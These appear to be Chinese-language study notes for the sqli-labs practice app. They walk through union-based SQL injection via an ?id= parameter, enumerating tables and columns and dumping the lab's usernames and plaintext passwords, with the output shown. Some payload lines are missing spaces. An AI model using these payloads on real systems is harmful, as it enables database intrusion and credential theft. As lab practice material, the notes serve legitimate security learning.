?id=' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+//Your Login name:emails,referers,uagents,users 找出来的表
获取表下面的列,查看是否正确
?id=' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+//Your Login name:id,username,password 拿到想要的结果,确定了表
获取所有密码和账号
?id=' unionselect1,group_concat(username),group_concat(password)from users --+
Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
//拿到所需要的账号和密码
?id=') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+//Your Login name:emails,referers,uagents,users 找出来的表
获取表下面的列,查看是否正确
?id=') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+//Your Login name:id,username,password 拿到想要的结果,确定了表
获取所有密码和账号
?id=')unionselect1,group_concat(username),group_concat(password)from users --+
Your Login name:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
Your Password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
//拿到所需要的账号和密码